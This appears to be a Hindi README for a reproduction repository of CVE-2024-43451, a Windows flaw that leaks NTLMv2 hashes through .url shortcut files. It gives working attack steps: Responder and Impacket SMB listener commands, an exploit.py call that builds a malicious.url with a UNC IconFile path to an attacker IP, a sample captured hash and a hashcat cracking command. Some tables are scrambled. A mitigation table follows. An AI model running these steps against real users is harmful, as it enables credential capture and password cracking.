
CVE पुनरुत्पादन: cve-2024-43451-ntlm_hash_disclosure_reproduction
CVE-2024-43451 Windows में एक NTLMv2 हैश प्रकटीकरण स्पूफिंग भेद्यता है। यह एक अनधिकृत दूरस्थ हमलावर को एक दुर्भावनापूर्ण .url शॉर्टकट फ़ाइल के साथ इंटरैक्ट करने के लिए प्रेरित करके पीड़ित के NTLM हैश को लीक करने की अनुमति देता है। यह भेद्यता न्यूनतम उपयोगकर्ता इंटरैक्शन के साथ ट्रिगर होती है — केवल फ़ाइल पर राइट-क्लिक करना, उसे हटाना या स्थानांतरित करना हैश लीक करने के लिए पर्याप्त है। इसका CVSS स्कोर 6.5 (मध्यम) है और इसे सक्रिय रूप से वास्तविक दुनिया में शोषित किया गया है। CISA ने इसे Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा।
NTLM (NT LAN Manager) एक चुनौती-प्रतिक्रिया प्रमाणीकरण प्रोटोकॉल है जिसका उपयोग Windows करता है। जब कोई क्लाइंट SMB के माध्यम से किसी संसाधन तक पहुँचने का प्रयास करता है, तो क्लाइंट और सर्वर एक हैंडशेक करते हैं:
NEGOTIATE_MESSAGE भेजता है जिसमें समर्थित क्षमताएँ होती हैं।CHALLENGE_MESSAGE के साथ प्रतिक्रिया देता है जिसमें एक 8-बाइट नॉन्स (सर्वर चुनौती) होता है।AUTHENTICATE_MESSAGE के साथ प्रतिक्रिया देता है जिसमें NTLMv2 हैश होता है — चुनौती का एक HMAC-MD5 जो उपयोगकर्ता के पासवर्ड हैश, उपयोगकर्ता नाम और डोमेन के साथ संयुक्त होता है।यदि कोई हमलावर अपने नियंत्रण वाली मशीन पर NTLM प्रमाणीकरण प्रयास को देख या ट्रिगर कर सकता है, तो कैप्चर किया गया AUTHENTICATE_MESSAGE ऑफ़लाइन क्रैक करके सादा पाठ पासवर्ड प्राप्त किया जा सकता है।
.url फ़ाइल एक शॉर्टकट फ़ाइल है जिसका उपयोग Internet Explorer और Windows Explorer लिंक संग्रहीत करने के लिए करते हैं। यह एक INI-स्वरूपित फ़ाइल है जिसमें [InternetShortcut] अनुभाग होता है। शोषण के लिए महत्वपूर्ण फ़ील्ड हैं:
URL= — वह लक्ष्य URL जिसे Windows खोलेगा।IconFile= — एक आइकन संसाधन के लिए एक वैकल्पिक UNC पथ। जब Windows Explorer फ़ाइल प्रस्तुत करता है, तो यह स्वचालित रूप से दूरस्थ शेयर से आइकन प्राप्त करने का प्रयास करता है, जो हमलावर के सर्वर पर NTLM प्रमाणीकरण प्रयास को ट्रिगर करता है।हमलावर एक .url फ़ाइल तैयार करता है जिसमें IconFile पैरामीटर \\attacker-ip\share\icon.ico की ओर इंगित करता है। जब पीड़ित:
Windows Explorer UNC पथ से आइकन लोड करने का प्रयास करता है, जिससे पीड़ित का NTLMv2 हैश हमलावर के SMB लिसनर (जैसे, Responder) को भेजा जाता है।
नवंबर 2024 पैच मंगलवार अपडेट से पहले Windows के सभी समर्थित संस्करण:
| उपकरण | विवरण |
|---|---|
| Responder | हैश कैप्चर के लिए अंतर्निहित SMB सर्वर के साथ LLMNR/NBT-NS/mDNS पॉइज़नर |
Responder का उपयोग करना:
sudo responder -I eth0 -v
या Impacket का उपयोग करना:
sudo impacket-smbserver share . -smb2support
python exploit.py --ip 192.168.1.100 --output malicious.url
निम्नलिखित में से कोई भी क्रिया हैश लीक को ट्रिगर करती है:
हमलावर का SMB लिसनर एक NTLMv2 हैश प्राप्त करता है:
[SMB] NTLMv2-SSP Hash : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
# \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.
एक सरल SMB शेयर होस्ट करने के लिए smbserver.py का उपयोग किया जा सकता है |
| Inveigh | Windows के लिए PowerShell-आधारित NTLM कैप्चर टूल |
| शमन | विवरण |
|---|
| नवंबर 2024 पैच लागू करें | KB5044285 से Microsoft का सुरक्षा अपडेट स्थापित करें |
| आउटबाउंड SMB (पोर्ट 445) अवरोधित करें | NTLM हैश को नेटवर्क परिधि से बाहर जाने से रोकें |
| जहाँ संभव हो NTLM अक्षम करें | केवल Kerberos प्रमाणीकरण का उपयोग करें |
| SMB साइनिंग सक्षम करें | हैश कैप्चर होने पर भी रिले हमलों को रोकता है |
| उपयोगकर्ता जागरूकता प्रशिक्षण | उपयोगकर्ताओं को अप्रत्याशित .url फ़ाइलों के साथ इंटरैक्ट न करने के लिए शिक्षित करें |
| .url फ़ाइल हैंडलिंग प्रतिबंधित करें | ईमेल के माध्यम से .url फ़ाइल निष्पादन या वितरण को ब्लॉक करने के लिए समूह नीति का उपयोग करें |